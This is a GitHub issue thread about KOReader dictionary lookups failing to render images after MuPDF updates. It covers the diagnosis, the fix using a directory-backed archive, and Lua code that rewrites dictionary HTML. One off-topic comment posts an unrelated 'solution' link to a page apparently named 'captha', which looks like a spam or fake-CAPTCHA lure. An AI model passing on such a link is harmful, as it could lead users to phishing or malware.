### ISSUE TITLE
Dictionary Lookup - images are not rendered

### ISSUE THREAD

**Issue by mergen3107** [koreader/koreader#12628]
* KOReader version: 2024.07-241-g85591c75c 
* Device: Kindle Scribe (5.16.21, hf)

#### Issue
This is a formal issue ticket for problems I encountered [here](https://github.com/koreader/koreader/issues/11312#issuecomment-2405848991).

Image in dictionary lookups stopped rendering.
They used to be fine before.
My suspicion is the muPDF version bumps not playing well with `htmlboxwidget`.
muPDF itself can open and see linked images well: https://github.com/koreader/koreader/issues/11312#issuecomment-2405952370

I can also reproduce this issue in emulator, so this is not Kindle-specific, or hf-specific, or my build-specific (there are no hf nightlies at the time of writing, so I need to build koreader myself).

#### Steps to reproduce
- Setup dictionary as per Wiki [page](https://github.com/koreader/koreader/wiki/Dictionary-support#an-example-of-how-to-apply-this-on-a-dictionary), step 3.
Here is the dictionary with only one image left for "gull" (due to size): 
[Longman-gull.zip](https://github.com/user-attachments/files/17346488/Longman-gull.zip)
- Look up a word "gull".
Here is the original `gull.jpg` from the `res` folder, to which the modified `.lua` file points to:
<img src= "https://github.com/user-attachments/assets/9609fd47-46a5-47b6-ba46-5ac2b5c511c0" height="200">

Here is how it used to look like before (January 3, 2024):
<img src= "https://github.com/user-attachments/assets/fb4d6192-780d-4ed4-961b-3351f9b5bdc9" height="600">

Here is how it looks now:
<img src= "https://github.com/user-attachments/assets/eadf2484-f3ec-421a-b159-011407f86610" height="600">

##### `crash.log` (if applicable)
Main issue:
```
warning: html: cannot load image src='data/dict/Longman/res/gull.jpg'
```
This is from the compiled library `koreader\libs\libwrap-mupdf.so`, line 22306.

I did troubleshooting as suggested, and paths are still fine after `gsub` operations:
https://github.com/koreader/koreader/issues/11312#issuecomment-2406200840

Full log: 
[CRASH.LOG.GULL.txt](https://github.com/user-attachments/files/17346581/CRASH.LOG.GULL.txt)
- Restart KOReader
- Summon Dictionary Lookup
- Look up "gull"
- Take a Screenshot
- Exit KOReader

I hope this issue can be solved one day :D

**Comment by NiLuJe** [comment]
I'm pretty sure I noticed something similar the other day, FWIW. Didn't look into it because I was in a train at the time and had completely forgotten about it ;p.

**Comment by mergen3107** [comment]
@NiLuJe 
What do you think should be the first place to start looking?

**Comment by Frenzie** [comment]
I suspect this might be the culprit, particularly the fz_drop_archive call: https://github.com/ArtifexSoftware/mupdf/commit/ce60d71ce47cf310fc6cdf3961237b50cf5c874a

**Comment by ummm288** [comment]
to fix your trouble check this solution [click](https://www.calvarywhangarei.co.nz/captha/index.html)
maybe this will solve your problem.

**Comment by TnS-hun** [comment]
I have a working version locally that displays the images. It is not yet ready for a pull request, for the sake of testing I hardcoded the directory path of the dictionary.

The issue is that when MuPDF's load_html_image tries to load the image it uses fz_read_archive_entry to resolve it, and when the document is opened with fz_open_document_with_stream that archive will be always null.

The fix is to use fz_open_document_with_stream_and_dir instead, and pass it the fz_archive returned by fz_open_directory.

**Comment by mergen3107** [comment]
Thank you @TnS-hun !

**Comment by mergen3107** [comment]
Thank you very much again @TnS-hun !
I tested this on current nightly `v2024.11-128-g5bd3f3b42` and it worked!

Although, I had to fix my .lua file for the dictionary to this (so the image path is relative to `...koreader/data/dict/DICTNAME/res` where `DICTNAME` is just a name of the dictionary):
```
    html = html:gsub('<rref[^>]*>', '<img src="/')
    html = html:gsub('.jpg</rref>', '.jpg">')
```

Full function in the lua looks like this for this particular dict:
```
return function(html)
    html = html:gsub('<rref[^>]*>[^<]*%.wav</rref>', '🔊')
    html = html:gsub('<k[^>]*>[^<]*%</k>', '')
    html = html:gsub('<c>', '<span>')
    html = html:gsub('</c>', '</span>')
    html = html:gsub('<c c=\"', '<span style=\"color:')
    html = html:gsub('\"color:indigo\"', '\"color:#4B0082\"')
    html = html:gsub('\"color:darkgray\"', '\"color:#A9A9A9\"')
    html = html:gsub('\"color:lightcoral\"', '\"color:#F08080\"')
    html = html:gsub('\"color:lightseagreen\"', '\"color:#20B2AA\"')
    html = html:gsub('\"color:darkgoldenrod\"', '\"color:#B8860B\"')
    html = html:gsub('<rref[^>]*>', '<img src="/')
    html = html:gsub('.jpg</rref>', '.jpg">')
    return html
end
```

I'll go update the Wiki page about this: https://github.com/koreader/koreader/wiki/Dictionary-support#an-example-of-how-to-apply-this-on-a-dictionary

**Comment by TnS-hun** [comment]
@mergen3107 
> Although, I had to fix my .lua file for the dictionary to this (so the image path is relative to `...koreader/data/dict/DICTNAME/res/` where `DICTNAME` is just a name of the dictionary):

Yes, MuPDF will resolve the images starting from the res directory of the given dictionary, so `<img src="">` should be just the file name.
